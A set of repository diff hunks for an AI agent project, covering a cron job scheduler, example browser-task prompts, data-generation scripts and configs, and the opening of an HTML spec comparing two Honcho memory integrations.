_cfg = yaml.safe_load(_f) or {}
_model_cfg = _cfg.get("model", {})
if isinstance(_model_cfg, str):
model = _model_cfg
elif isinstance(_model_cfg, dict):
model = _model_cfg.get("default", model)
except Exception as e:
logger.warning("Job '%s': failed to load config.yaml, using defaults: %s", job_id, e)
# Reasoning config from env or config.yaml
reasoning_config = None
effort = os.getenv("HERMES_REASONING_EFFORT", "")
if not effort:
effort = str(_cfg.get("agent", {}).get("reasoning_effort", "")).strip()
        if effort:
            valid = ("xhigh", "high", "medium", "low", "minimal")
            if effort.lower() in valid:
                reasoning_config = {"enabled": True, "effort": effort.lower()}
            elif effort.lower() == "none":
                # An explicit "none" disables reasoning entirely
                reasoning_config = {"enabled": False}
# Prefill messages from env or config.yaml
prefill_messages = None
prefill_file = os.getenv("HERMES_PREFILL_MESSAGES_FILE", "") or _cfg.get("prefill_messages_file", "")
if prefill_file:
import json as _json
pfpath = Path(prefill_file).expanduser()
if not pfpath.is_absolute():
pfpath = _hermes_home / pfpath
if pfpath.exists():
try:
with open(pfpath, "r", encoding="utf-8") as _pf:
prefill_messages = _json.load(_pf)
if not isinstance(prefill_messages, list):
prefill_messages = None
except Exception as e:
logger.warning("Job '%s': failed to parse prefill messages file '%s': %s", job_id, pfpath, e)
prefill_messages = None
# Max iterations
max_iterations = _cfg.get("agent", {}).get("max_turns") or _cfg.get("max_turns") or 90
# Provider routing
pr = _cfg.get("provider_routing", {})
from hermes_cli.runtime_provider import (
resolve_runtime_provider,
format_runtime_provider_error,
)
try:
runtime = resolve_runtime_provider(
requested=os.getenv("HERMES_INFERENCE_PROVIDER"),
)
except Exception as exc:
message = format_runtime_provider_error(exc)
raise RuntimeError(message) from exc
agent = AIAgent(
model=model,
api_key=runtime.get("api_key"),
base_url=runtime.get("base_url"),
provider=runtime.get("provider"),
api_mode=runtime.get("api_mode"),
max_iterations=max_iterations,
reasoning_config=reasoning_config,
prefill_messages=prefill_messages,
providers_allowed=pr.get("only"),
providers_ignored=pr.get("ignore"),
providers_order=pr.get("order"),
provider_sort=pr.get("sort"),
quiet_mode=True,
session_id=f"cron_{job_id}_{_hermes_now().strftime('%Y%m%d_%H%M%S')}"
)
result = agent.run_conversation(prompt)
final_response = result.get("final_response", "")
if not final_response:
final_response = "(No response generated)"
output = f"""# Cron Job: {job_name}
**Job ID:** {job_id}
**Run Time:** {_hermes_now().strftime('%Y-%m-%d %H:%M:%S')}
**Schedule:** {job.get('schedule_display', 'N/A')}
## Prompt
{prompt}
## Response
{final_response}
"""
logger.info("Job '%s' completed successfully", job_name)
return True, output, final_response, None
except Exception as e:
error_msg = f"{type(e).__name__}: {str(e)}"
logger.error("Job '%s' failed: %s", job_name, error_msg)
output = f"""# Cron Job: {job_name} (FAILED)
**Job ID:** {job_id}
**Run Time:** {_hermes_now().strftime('%Y-%m-%d %H:%M:%S')}
**Schedule:** {job.get('schedule_display', 'N/A')}
## Prompt
{prompt}
## Error
```
{error_msg}
{traceback.format_exc()}
```
"""
return False, output, "", error_msg
finally:
# Clean up injected env vars so they don't leak to other jobs
for key in ("HERMES_SESSION_PLATFORM", "HERMES_SESSION_CHAT_ID", "HERMES_SESSION_CHAT_NAME"):
os.environ.pop(key, None)
def tick(verbose: bool = True) -> int:
"""
Check and run all due jobs.
Uses a file lock so only one tick runs at a time, even if the gateway's
in-process ticker and a standalone daemon or manual tick overlap.
Args:
verbose: Whether to print status messages
Returns:
Number of jobs executed (0 if another tick is already running)
"""
_LOCK_DIR.mkdir(parents=True, exist_ok=True)
# Cross-platform file locking: fcntl on Unix, msvcrt on Windows
lock_fd = None
try:
lock_fd = open(_LOCK_FILE, "w")
if fcntl:
fcntl.flock(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
elif msvcrt:
msvcrt.locking(lock_fd.fileno(), msvcrt.LK_NBLCK, 1)
except (OSError, IOError):
logger.debug("Tick skipped — another instance holds the lock")
if lock_fd is not None:
lock_fd.close()
return 0
try:
due_jobs = get_due_jobs()
if verbose and not due_jobs:
logger.info("%s - No jobs due", _hermes_now().strftime('%H:%M:%S'))
return 0
if verbose:
logger.info("%s - %s job(s) due", _hermes_now().strftime('%H:%M:%S'), len(due_jobs))
executed = 0
for job in due_jobs:
try:
success, output, final_response, error = run_job(job)
output_file = save_job_output(job["id"], output)
if verbose:
logger.info("Output saved to: %s", output_file)
# Deliver the final response to the origin/target chat
deliver_content = final_response if success else f"⚠️ Cron job '{job.get('name', job['id'])}' failed:\n{error}"
if deliver_content:
try:
_deliver_result(job, deliver_content)
except Exception as de:
logger.error("Delivery failed for job %s: %s", job["id"], de)
mark_job_run(job["id"], success, error)
executed += 1
except Exception as e:
logger.error("Error processing job %s: %s", job['id'], e)
mark_job_run(job["id"], False, str(e))
return executed
finally:
if fcntl:
fcntl.flock(lock_fd, fcntl.LOCK_UN)
elif msvcrt:
try:
msvcrt.locking(lock_fd.fileno(), msvcrt.LK_UNLCK, 1)
except (OSError, IOError):
pass
lock_fd.close()
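
# Manual invocation sketch: running this module directly performs a single
# scheduler tick, which is handy for testing job schedules without the gateway:
#   python cron/scheduler.py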
if __name__ == "__main__":
tick(verbose=True)


@@ -0,0 +1,5 @@
{"prompt": "Go to https://news.ycombinator.com and find the top 5 posts on the front page. For each post, get the title, URL, points, and number of comments. Return the results as a formatted summary."}
{"prompt": "Navigate to https://en.wikipedia.org/wiki/Hermes and extract the first paragraph of the article, the image caption, and the list of items in the infobox. Summarize what you find."}
{"prompt": "Go to https://github.com/trending and find the top 3 trending repositories today. For each repo, get the name, description, language, and star count. Write the results to a file called trending_repos.md."}
{"prompt": "Visit https://httpbin.org/forms/post and fill out the form with sample data (customer name: Jane Doe, size: Medium, topping: Bacon, delivery time: 12:00). Submit the form and report what the response page shows."}
{"prompt": "Navigate to https://books.toscrape.com, browse to the Travel category, find the highest-rated book, and extract its title, price, availability, and description."}


@@ -0,0 +1,65 @@
#!/bin/bash
# =============================================================================
# Example: Browser-Focused Data Generation
# =============================================================================
#
# Generates tool-calling trajectories for browser automation tasks.
# The agent navigates websites, fills forms, extracts information, etc.
#
# Distribution: browser 97%, web 20%, vision 12%, terminal 15%
#
# Prerequisites:
# - OPENROUTER_API_KEY in ~/.hermes/.env
# - BROWSERBASE_API_KEY in ~/.hermes/.env (for browser tools)
# - A dataset JSONL file with one {"prompt": "..."} per line
#
# Usage:
# cd ~/.hermes/hermes-agent
# bash datagen-config-examples/run_browser_tasks.sh
#
# Output: data/browser_tasks_example/trajectories.jsonl
# =============================================================================
mkdir -p logs
LOG_FILE="logs/browser_tasks_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging to: $LOG_FILE"
# Point to the example dataset in this directory
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
python batch_runner.py \
--dataset_file="$SCRIPT_DIR/example_browser_tasks.jsonl" \
--batch_size=5 \
--run_name="browser_tasks_example" \
--distribution="browser_tasks" \
--model="anthropic/claude-sonnet-4" \
--base_url="https://openrouter.ai/api/v1" \
--num_workers=3 \
--max_turns=30 \
--ephemeral_system_prompt="You are an AI assistant with browser automation capabilities. Your primary task is to navigate and interact with web pages to accomplish user goals.
IMPORTANT GUIDELINES:
1. SEARCHING: Do NOT search directly on Google via the browser — they block automated searches. Use the web_search tool first to find URLs, then navigate to them with browser tools.
2. COOKIE/PRIVACY DIALOGS: After navigating to a page, check for cookie consent or privacy popups. Dismiss them by clicking Accept/Close/OK before interacting with other elements. Take a fresh browser_snapshot afterward.
3. HANDLING TIMEOUTS: If an action times out, the element may be blocked by an overlay. Take a new snapshot and look for dialogs to dismiss. If none, try an alternative approach or report the issue.
4. GENERAL: Use browser tools to click, fill forms, and extract information. Use terminal for local file operations. Verify your actions and handle errors gracefully." \
2>&1 | tee "$LOG_FILE"
echo "✅ Done. Log: $LOG_FILE"
# =============================================================================
# Common options you can add:
#
# --resume Resume from checkpoint if interrupted
# --verbose Enable detailed logging
# --max_tokens=63000 Set max response tokens
# --reasoning_disabled Disable model thinking/reasoning tokens
# --providers_allowed="anthropic,google" Restrict to specific providers
# --prefill_messages_file="configs/prefill.json" Few-shot priming
# =============================================================================


@@ -0,0 +1,101 @@
# Trajectory Compression Configuration
#
# Post-processes completed agent trajectories to fit within a target token budget.
# Compression preserves head/tail turns and summarizes middle content only as needed.
# Tokenizer settings for accurate token counting
tokenizer:
# HuggingFace tokenizer name
name: "moonshotai/Kimi-K2-Thinking"
# Trust remote code (required for some tokenizers)
trust_remote_code: true
# Compression targets and behavior
compression:
# Target maximum tokens for compressed trajectory
target_max_tokens: 29000
# Target size for summary (in tokens)
# This is factored into calculations when determining what to compress
summary_target_tokens: 750
# Protected turns that should NEVER be compressed
protected_turns:
# Always protect the first system message (tool definitions)
first_system: true
# Always protect the first human message (original request)
first_human: true
# Always protect the first gpt message (initial response/tool_call)
first_gpt: true
# Always protect the first tool response (result of first action)
first_tool: true
  # Always protect the last N turns (default 4 = the last 2 complete turn
  # pairs, gpt+tool or gpt only). This ensures the model's final actions
  # and conclusions are preserved.
  last_n_turns: 4
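  # Example: with last_n_turns: 4, a trailing [gpt, tool, gpt, tool]
  # sequence is never summarized, however long the trajectory gets.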
# LLM settings for generating summaries (OpenRouter only)
summarization:
# Model to use for summarization (should be fast and cheap)
# Using OpenRouter model path format
model: "google/gemini-3-flash-preview"
# OpenRouter API settings
base_url: "https://openrouter.ai/api/v1"
# Environment variable containing OpenRouter API key
api_key_env: "OPENROUTER_API_KEY"
# Temperature for summarization (lower = more deterministic)
temperature: 0.3
# Max retries for API failures
max_retries: 3
# Delay between retries (seconds)
retry_delay: 2
# Output settings
output:
# Add notice to system message about potential summarization
add_summary_notice: true
# Text to append to system message
summary_notice_text: "\n\nSome of the conversation may be summarized to preserve context."
# Output directory suffix (appended to input directory name)
output_suffix: "_compressed"
# Processing settings
processing:
# Number of parallel workers for batch processing
num_workers: 4
# Maximum concurrent API calls for summarization (async parallelism)
max_concurrent_requests: 50
# Skip trajectories that are already under target length
skip_under_target: true
# If true, save trajectories even if compression can't get under target
# (will compress as much as possible)
save_over_limit: true
# Timeout per trajectory in seconds (skip if takes longer)
# Helps avoid hanging on problematic entries
per_trajectory_timeout: 300 # 5 minutes
# Metrics to track
metrics:
# Log detailed compression statistics
enabled: true
# Save per-trajectory metrics in output
per_trajectory: false
# Metrics file name (saved in output directory)
output_file: "compression_metrics.json"


@@ -0,0 +1,46 @@
# datagen-config-examples/web_research.yaml
#
# Batch data generation config for WebResearchEnv.
# Generates tool-calling trajectories for multi-step web research tasks.
#
# Usage:
# python batch_runner.py \
# --config datagen-config-examples/web_research.yaml \
# --run_name web_research_v1
environment: web-research
# Toolsets available to the agent during data generation
toolsets:
- web
- file
# How many parallel workers to use
num_workers: 4
# Questions per batch
batch_size: 20
# Total trajectories to generate (comment out to run full dataset)
max_items: 500
# Model to use for generation (override with --model flag)
model: openrouter/nousresearch/hermes-3-llama-3.1-405b
# System prompt additions (ephemeral — not saved to trajectories)
ephemeral_system_prompt: |
You are a highly capable research agent. When asked a factual question,
always use web_search to find current, accurate information before answering.
Cite at least 2 sources. Be concise and accurate.
# Output directory
output_dir: data/web_research_v1
# Trajectory compression settings (for fitting into training token budgets)
compression:
enabled: true
target_max_tokens: 16000
# Eval settings
eval_every: 100 # Run eval every N trajectories
eval_size: 25 # Number of held-out questions per eval run


@@ -0,0 +1,698 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>honcho-integration-spec</title>
<style>
:root {
--bg: #0b0e14;
--bg-surface: #11151c;
--bg-elevated: #181d27;
--bg-code: #0d1018;
--fg: #c9d1d9;
--fg-bright: #e6edf3;
--fg-muted: #6e7681;
--fg-subtle: #484f58;
--accent: #7eb8f6;
--accent-dim: #3d6ea5;
--accent-glow: rgba(126, 184, 246, 0.08);
--green: #7ee6a8;
--green-dim: #2ea04f;
--orange: #e6a855;
--red: #f47067;
--purple: #bc8cff;
--cyan: #56d4dd;
--border: #21262d;
--border-subtle: #161b22;
--radius: 6px;
--font-sans: 'New York', ui-serif, 'Iowan Old Style', 'Apple Garamond', Baskerville, 'Times New Roman', 'Noto Emoji', serif;
--font-mono: 'Departure Mono', 'Noto Emoji', monospace;
}
*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
html { scroll-behavior: smooth; scroll-padding-top: 2rem; }
body {
font-family: var(--font-sans);
background: var(--bg);
color: var(--fg);
line-height: 1.7;
font-size: 15px;
-webkit-font-smoothing: antialiased;
}
.container { max-width: 860px; margin: 0 auto; padding: 3rem 2rem 6rem; }
.hero {
text-align: center;
padding: 4rem 0 3rem;
border-bottom: 1px solid var(--border);
margin-bottom: 3rem;
}
.hero h1 { font-family: var(--font-mono); font-size: 2.2rem; font-weight: 700; color: var(--fg-bright); letter-spacing: -0.03em; margin-bottom: 0.5rem; }
.hero h1 span { color: var(--accent); }
.hero .subtitle { font-family: var(--font-sans); color: var(--fg-muted); font-size: 0.92rem; max-width: 560px; margin: 0 auto; line-height: 1.6; }
.hero .meta { margin-top: 1.5rem; display: flex; justify-content: center; gap: 1.5rem; flex-wrap: wrap; }
.hero .meta span { font-size: 0.8rem; color: var(--fg-subtle); font-family: var(--font-mono); }
.toc { background: var(--bg-surface); border: 1px solid var(--border); border-radius: var(--radius); padding: 1.5rem 2rem; margin-bottom: 3rem; }
.toc h2 { font-size: 0.75rem; text-transform: uppercase; letter-spacing: 0.1em; color: var(--fg-muted); margin-bottom: 1rem; }
.toc ol { list-style: none; counter-reset: toc; columns: 2; column-gap: 2rem; }
.toc li { counter-increment: toc; break-inside: avoid; margin-bottom: 0.35rem; }
.toc li::before { content: counter(toc, decimal-leading-zero) " "; color: var(--fg-subtle); font-family: var(--font-mono); font-size: 0.75rem; margin-right: 0.25rem; }
.toc a { font-family: var(--font-mono); color: var(--fg); text-decoration: none; font-size: 0.82rem; transition: color 0.15s; }
.toc a:hover { color: var(--accent); }
section { margin-bottom: 4rem; }
section + section { padding-top: 1rem; }
h2 { font-family: var(--font-mono); font-size: 1.3rem; font-weight: 700; color: var(--fg-bright); letter-spacing: -0.01em; margin-bottom: 1.25rem; padding-bottom: 0.5rem; border-bottom: 1px solid var(--border); }
h3 { font-family: var(--font-mono); font-size: 1rem; font-weight: 600; color: var(--fg-bright); margin-top: 2rem; margin-bottom: 0.75rem; }
h4 { font-family: var(--font-mono); font-size: 0.9rem; font-weight: 600; color: var(--accent); margin-top: 1.5rem; margin-bottom: 0.5rem; }
p { margin-bottom: 1rem; font-size: 0.95rem; line-height: 1.75; }
strong { color: var(--fg-bright); font-weight: 600; }
a { color: var(--accent); text-decoration: none; }
a:hover { text-decoration: underline; }
ul, ol { margin-bottom: 1rem; padding-left: 1.5rem; font-size: 0.93rem; line-height: 1.7; }
li { margin-bottom: 0.35rem; }
li::marker { color: var(--fg-subtle); }
.table-wrap { overflow-x: auto; margin-bottom: 1.5rem; }
table { width: 100%; border-collapse: collapse; font-size: 0.88rem; }
th, td { text-align: left; padding: 0.6rem 1rem; border-bottom: 1px solid var(--border-subtle); }
th { font-family: var(--font-mono); font-size: 0.72rem; text-transform: uppercase; letter-spacing: 0.06em; color: var(--fg-muted); background: var(--bg-surface); border-bottom-color: var(--border); white-space: nowrap; }
td { font-family: var(--font-sans); font-size: 0.88rem; color: var(--fg); }
tr:hover td { background: var(--accent-glow); }
td code { background: var(--bg-elevated); padding: 0.15em 0.4em; border-radius: 3px; font-family: var(--font-mono); font-size: 0.82em; color: var(--cyan); }
pre { background: var(--bg-code); border: 1px solid var(--border); border-radius: var(--radius); padding: 1.25rem 1.5rem; overflow-x: auto; margin-bottom: 1.5rem; font-family: var(--font-mono); font-size: 0.82rem; line-height: 1.65; color: var(--fg); }
pre code { background: none; padding: 0; color: inherit; font-size: inherit; }
code { font-family: var(--font-mono); font-size: 0.85em; }
p code, li code { background: var(--bg-elevated); padding: 0.15em 0.4em; border-radius: 3px; color: var(--cyan); font-size: 0.85em; }
.kw { color: var(--purple); }
.str { color: var(--green); }
.cm { color: var(--fg-subtle); font-style: italic; }
.num { color: var(--orange); }
.key { color: var(--accent); }
.mermaid { margin: 1.5rem 0 2rem; text-align: center; }
.mermaid svg { max-width: 100%; height: auto; }
.callout { font-family: var(--font-sans); background: var(--bg-surface); border-left: 3px solid var(--accent-dim); border-radius: 0 var(--radius) var(--radius) 0; padding: 1rem 1.25rem; margin-bottom: 1.5rem; font-size: 0.88rem; color: var(--fg-muted); line-height: 1.6; }
.callout strong { font-family: var(--font-mono); color: var(--fg-bright); }
.callout.success { border-left-color: var(--green-dim); }
.callout.warn { border-left-color: var(--orange); }
.badge { display: inline-block; font-family: var(--font-mono); font-size: 0.65rem; font-weight: 600; text-transform: uppercase; letter-spacing: 0.05em; padding: 0.2em 0.6em; border-radius: 3px; vertical-align: middle; margin-left: 0.4rem; }
.badge-done { background: var(--green-dim); color: #fff; }
.badge-wip { background: var(--orange); color: #0b0e14; }
.badge-todo { background: var(--fg-subtle); color: var(--fg); }
.checklist { list-style: none; padding-left: 0; }
.checklist li { padding-left: 1.5rem; position: relative; margin-bottom: 0.5rem; }
.checklist li::before { position: absolute; left: 0; font-family: var(--font-mono); font-size: 0.85rem; }
.checklist li.done { color: var(--fg-muted); }
.checklist li.done::before { content: "\2713"; color: var(--green); }
.checklist li.todo::before { content: "\25CB"; color: var(--fg-subtle); }
.checklist li.wip::before { content: "\25D4"; color: var(--orange); }
.compare { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; margin-bottom: 2rem; }
.compare-card { background: var(--bg-surface); border: 1px solid var(--border); border-radius: var(--radius); padding: 1.25rem; }
.compare-card h4 { margin-top: 0; font-size: 0.82rem; }
.compare-card.after { border-color: var(--accent-dim); }
.compare-card ul { font-family: var(--font-mono); padding-left: 1.25rem; font-size: 0.8rem; }
hr { border: none; border-top: 1px solid var(--border); margin: 3rem 0; }
.progress-bar { position: fixed; top: 0; left: 0; height: 2px; background: var(--accent); z-index: 999; transition: width 0.1s linear; }
@media (max-width: 640px) {
.container { padding: 2rem 1rem 4rem; }
.hero h1 { font-size: 1.6rem; }
.toc ol { columns: 1; }
.compare { grid-template-columns: 1fr; }
table { font-size: 0.8rem; }
th, td { padding: 0.4rem 0.6rem; }
}
</style>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link href="https://fonts.googleapis.com/css2?family=Noto+Emoji&display=swap" rel="stylesheet">
<style>
@font-face {
font-family: 'Departure Mono';
src: url('https://cdn.jsdelivr.net/gh/rektdeckard/departure-mono@latest/fonts/DepartureMono-Regular.woff2') format('woff2');
font-weight: normal;
font-style: normal;
font-display: swap;
}
</style>
</head>
<body>
<div class="progress-bar" id="progress"></div>
<div class="container">
<header class="hero">
<h1>honcho<span>-integration-spec</span></h1>
<p class="subtitle">Comparison of Hermes Agent vs. openclaw-honcho — and a porting spec for bringing Hermes patterns into other Honcho integrations.</p>
<div class="meta">
<span>hermes-agent / openclaw-honcho</span>
<span>Python + TypeScript</span>
<span>2026-03-09</span>
</div>
</header>
<nav class="toc">
<h2>Contents</h2>
<ol>
<li><a href="#overview">Overview</a></li>
<li><a href="#architecture">Architecture comparison</a></li>
<li><a href="#diff-table">Diff table</a></li>
<li><a href="#patterns">Hermes patterns to port</a></li>
<li><a href="#spec-async">Spec: async prefetch</a></li>
<li><a href="#spec-reasoning">Spec: dynamic reasoning level</a></li>
<li><a href="#spec-modes">Spec: per-peer memory modes</a></li>
<li><a href="#spec-identity">Spec: AI peer identity formation</a></li>
<li><a href="#spec-sessions">Spec: session naming strategies</a></li>
<li><a href="#spec-cli">Spec: CLI surface injection</a></li>
<li><a href="#openclaw-checklist">openclaw-honcho checklist</a></li>
<li><a href="#nanobot-checklist">nanobot-honcho checklist</a></li>
</ol>
</nav>
<!-- OVERVIEW -->
<section id="overview">
<h2>Overview</h2>
<p>Two independent Honcho integrations have been built for two different agent runtimes: <strong>Hermes Agent</strong> (Python, baked into the runner) and <strong>openclaw-honcho</strong> (TypeScript plugin via hook/tool API). Both use the same Honcho peer paradigm — dual peer model, <code>session.context()</code>, <code>peer.chat()</code> — but they made different tradeoffs at every layer.</p>
<p>This document maps those tradeoffs and defines a porting spec: a set of Hermes-originated patterns, each stated as an integration-agnostic interface, that any Honcho integration can adopt regardless of runtime or language.</p>
<div class="callout">
<strong>Scope</strong> Both integrations work correctly today. This spec is about the delta — patterns in Hermes that are worth propagating and patterns in openclaw-honcho that Hermes should eventually adopt. The spec is additive, not prescriptive.
</div>
</section>
<!-- ARCHITECTURE -->
<section id="architecture">
<h2>Architecture comparison</h2>
<h3>Hermes: baked-in runner</h3>
<p>Honcho is initialised directly inside <code>AIAgent.__init__</code>. There is no plugin boundary. Session management, context injection, async prefetch, and CLI surface are all first-class concerns of the runner. Context is injected once per session (baked into <code>_cached_system_prompt</code>) and never re-fetched mid-session — this maximises prefix cache hits at the LLM provider.</p>
<div class="mermaid">
%%{init: {'theme': 'dark', 'themeVariables': { 'primaryColor': '#1f3150', 'primaryTextColor': '#c9d1d9', 'primaryBorderColor': '#3d6ea5', 'lineColor': '#3d6ea5', 'secondaryColor': '#162030', 'tertiaryColor': '#11151c' }}}%%
flowchart TD
U["user message"] --> P["_honcho_prefetch()<br/>(reads cache — no HTTP)"]
P --> SP["_build_system_prompt()<br/>(first turn only, cached)"]
SP --> LLM["LLM call"]
LLM --> R["response"]
R --> FP["_honcho_fire_prefetch()<br/>(daemon threads, turn end)"]
FP --> C1["prefetch_context() thread"]
FP --> C2["prefetch_dialectic() thread"]
C1 --> CACHE["_context_cache / _dialectic_cache"]
C2 --> CACHE
style U fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style P fill:#1f3150,stroke:#3d6ea5,color:#c9d1d9
style SP fill:#1f3150,stroke:#3d6ea5,color:#c9d1d9
style LLM fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style R fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style FP fill:#2a1a40,stroke:#bc8cff,color:#c9d1d9
style C1 fill:#2a1a40,stroke:#bc8cff,color:#c9d1d9
style C2 fill:#2a1a40,stroke:#bc8cff,color:#c9d1d9
style CACHE fill:#11151c,stroke:#484f58,color:#6e7681
</div>
<h3>openclaw-honcho: hook-based plugin</h3>
<p>The plugin registers hooks against OpenClaw's event bus. Context is fetched synchronously inside <code>before_prompt_build</code> on every turn. Message capture happens in <code>agent_end</code>. The multi-agent hierarchy is tracked via <code>subagent_spawned</code>. This model is correct but every turn pays a blocking Honcho round-trip before the LLM call can begin.</p>
<div class="mermaid">
%%{init: {'theme': 'dark', 'themeVariables': { 'primaryColor': '#1f3150', 'primaryTextColor': '#c9d1d9', 'primaryBorderColor': '#3d6ea5', 'lineColor': '#3d6ea5', 'secondaryColor': '#162030', 'tertiaryColor': '#11151c' }}}%%
flowchart TD
U2["user message"] --> BPB["before_prompt_build<br/>(BLOCKING HTTP — every turn)"]
BPB --> CTX["session.context()"]
CTX --> SP2["system prompt assembled"]
SP2 --> LLM2["LLM call"]
LLM2 --> R2["response"]
R2 --> AE["agent_end hook"]
AE --> SAVE["session.addMessages()<br/>session.setMetadata()"]
style U2 fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style BPB fill:#3a1515,stroke:#f47067,color:#c9d1d9
style CTX fill:#3a1515,stroke:#f47067,color:#c9d1d9
style SP2 fill:#1f3150,stroke:#3d6ea5,color:#c9d1d9
style LLM2 fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style R2 fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style AE fill:#162030,stroke:#3d6ea5,color:#c9d1d9
style SAVE fill:#11151c,stroke:#484f58,color:#6e7681
</div>
</section>
<!-- DIFF TABLE -->
<section id="diff-table">
<h2>Diff table</h2>
<div class="table-wrap">
<table>
<thead>
<tr>
<th>Dimension</th>
<th>Hermes Agent</th>
<th>openclaw-honcho</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Context injection timing</strong></td>
<td>Once per session (cached). Zero HTTP on response path after turn 1.</td>
<td>Every turn, blocking. Fresh context per turn but adds latency.</td>
</tr>
<tr>
<td><strong>Prefetch strategy</strong></td>
<td>Daemon threads fire at turn end; consumed next turn from cache.</td>
<td>None. Blocking call at prompt-build time.</td>
</tr>
<tr>
<td><strong>Dialectic (peer.chat)</strong></td>
<td>Prefetched async; result injected into system prompt next turn.</td>
<td>On-demand via <code>honcho_recall</code> / <code>honcho_analyze</code> tools.</td>
</tr>
<tr>
<td><strong>Reasoning level</strong></td>
<td>Dynamic: scales with message length. Floor = config default. Cap = "high".</td>
<td>Fixed per tool: recall=minimal, analyze=medium.</td>
</tr>
<tr>
<td><strong>Memory modes</strong></td>
<td><code>user_memory_mode</code> / <code>agent_memory_mode</code>: hybrid / honcho / local.</td>
<td>None. Always writes to Honcho.</td>
</tr>
<tr>
<td><strong>Write frequency</strong></td>
<td>async (background queue), turn, session, N turns.</td>
<td>After every agent_end (no control).</td>
</tr>
<tr>
<td><strong>AI peer identity</strong></td>
<td><code>observe_me=True</code>, <code>seed_ai_identity()</code>, <code>get_ai_representation()</code>, SOUL.md → AI peer.</td>
<td>Agent files uploaded to agent peer at setup. No ongoing self-observation seeding.</td>
</tr>
<tr>
<td><strong>Context scope</strong></td>
<td>User peer + AI peer representation, both injected.</td>
<td>User peer (owner) representation + conversation summary. <code>peerPerspective</code> on context call.</td>
</tr>
<tr>
<td><strong>Session naming</strong></td>
<td>per-directory / global / manual map / title-based.</td>
<td>Derived from platform session key.</td>
</tr>
<tr>
<td><strong>Multi-agent</strong></td>
<td>Single-agent only.</td>
<td>Parent observer hierarchy via <code>subagent_spawned</code>.</td>
</tr>
<tr>
<td><strong>Tool surface</strong></td>
<td>Single <code>query_user_context</code> tool (on-demand dialectic).</td>
<td>6 tools: session, profile, search, context (fast) + recall, analyze (LLM).</td>
</tr>
<tr>
<td><strong>Platform metadata</strong></td>
<td>Not stripped.</td>
<td>Explicitly stripped before Honcho storage.</td>
</tr>
<tr>
<td><strong>Message dedup</strong></td>
<td>None (sends on every save cycle).</td>
<td><code>lastSavedIndex</code> in session metadata prevents re-sending.</td>
</tr>
<tr>
<td><strong>CLI surface in prompt</strong></td>
<td>Management commands injected into system prompt. Agent knows its own CLI.</td>
<td>Not injected.</td>
</tr>
<tr>
<td><strong>AI peer name in identity</strong></td>
<td>Replaces "Hermes Agent" in DEFAULT_AGENT_IDENTITY when configured.</td>
<td>Not implemented.</td>
</tr>
<tr>
<td><strong>QMD / local file search</strong></td>
<td>Not implemented.</td>
<td>Passthrough tools when QMD backend configured.</td>
</tr>
<tr>
<td><strong>Workspace metadata</strong></td>
<td>Not implemented.</td>
<td><code>agentPeerMap</code> in workspace metadata tracks agent&#8594;peer ID.</td>
</tr>
</tbody>
</table>
</div>
</section>
<!-- PATTERNS -->
<section id="patterns">
<h2>Hermes patterns to port</h2>
<p>Six patterns from Hermes are worth adopting in any Honcho integration. They are described below as integration-agnostic interfaces — the implementation will differ per runtime, but the contract is the same.</p>
<div class="compare">
<div class="compare-card">
<h4>Patterns Hermes contributes</h4>
<ul>
<li>Async prefetch (zero-latency)</li>
<li>Dynamic reasoning level</li>
<li>Per-peer memory modes</li>
<li>AI peer identity formation</li>
<li>Session naming strategies</li>
<li>CLI surface injection</li>
</ul>
</div>
<div class="compare-card after">
<h4>Patterns openclaw contributes back</h4>
<ul>
<li>lastSavedIndex dedup</li>
<li>Platform metadata stripping</li>
<li>Multi-agent observer hierarchy</li>
<li>peerPerspective on context()</li>
<li>Tiered tool surface (fast/LLM)</li>
<li>Workspace agentPeerMap</li>
</ul>
</div>
</div>
</section>
<!-- SPEC: ASYNC PREFETCH -->
<section id="spec-async">
<h2>Spec: async prefetch</h2>
<h3>Problem</h3>
<p>Calling <code>session.context()</code> and <code>peer.chat()</code> synchronously before each LLM call adds 200–800 ms of Honcho round-trip latency to every turn. Users experience this as the agent "thinking slowly."</p>
<h3>Pattern</h3>
<p>Fire both calls as non-blocking background work at the <strong>end</strong> of each turn. Store results in a per-session cache keyed by session ID. At the <strong>start</strong> of the next turn, pop from cache — the HTTP is already done. First turn is cold (empty cache); all subsequent turns are zero-latency on the response path.</p>
<h3>Interface contract</h3>
<pre><code><span class="cm">// TypeScript (openclaw / nanobot plugin shape)</span>
<span class="kw">interface</span> <span class="key">AsyncPrefetch</span> {
<span class="cm">// Fire context + dialectic fetches at turn end. Non-blocking.</span>
firePrefetch(sessionId: <span class="str">string</span>, userMessage: <span class="str">string</span>): <span class="kw">void</span>;
<span class="cm">// Pop cached results at turn start. Returns empty if cache is cold.</span>
popContextResult(sessionId: <span class="str">string</span>): ContextResult | <span class="kw">null</span>;
popDialecticResult(sessionId: <span class="str">string</span>): <span class="str">string</span> | <span class="kw">null</span>;
}
<span class="kw">type</span> <span class="key">ContextResult</span> = {
representation: <span class="str">string</span>;
card: <span class="str">string</span>[];
aiRepresentation?: <span class="str">string</span>; <span class="cm">// AI peer context if enabled</span>
summary?: <span class="str">string</span>; <span class="cm">// conversation summary if fetched</span>
};</code></pre>
<h3>Implementation notes</h3>
<ul>
<li>Python: <code>threading.Thread(daemon=True)</code>. Write to <code>dict[session_id, result]</code> — GIL makes this safe for simple writes.</li>
<li>TypeScript: store the in-flight <code>Promise</code> in a <code>Map&lt;string, Promise&lt;ContextResult&gt;&gt;</code> and track whether it has settled. At pop time, return the value only if it has already resolved; if it is still in flight, return null rather than awaiting.</li>
<li>The pop is destructive: clears the cache entry after reading so stale data never accumulates.</li>
<li>Prefetch should also fire on first turn (even though it won't be consumed until turn 2) — this ensures turn 2 is never cold.</li>
</ul>
<h3>openclaw-honcho adoption</h3>
